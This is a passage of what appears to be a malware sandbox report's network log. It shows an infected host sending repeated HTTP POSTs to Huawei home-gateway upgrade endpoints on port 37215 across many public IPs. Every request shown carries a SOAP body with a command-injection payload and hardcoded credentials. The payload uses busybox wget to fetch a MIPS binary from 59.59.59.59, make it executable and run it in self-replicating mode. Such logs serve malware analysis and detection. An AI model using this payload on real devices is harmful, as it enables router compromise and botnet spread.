2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1101192.168.2.1543760197.96.134.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728173971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1102192.168.2.154735641.129.43.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728198051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1103192.168.2.1533656197.241.0.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728302002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1104192.168.2.1550960157.121.150.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728317976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1105192.168.2.1539526195.159.184.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728341103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1106192.168.2.1553026197.58.208.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728363037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1107192.168.2.155283093.22.120.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728416920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1108192.168.2.1551272157.76.221.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728492022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1109192.168.2.1544806157.11.162.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728692055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1110192.168.2.154480036.216.242.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728714943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1111192.168.2.1537816157.182.135.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.728748083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
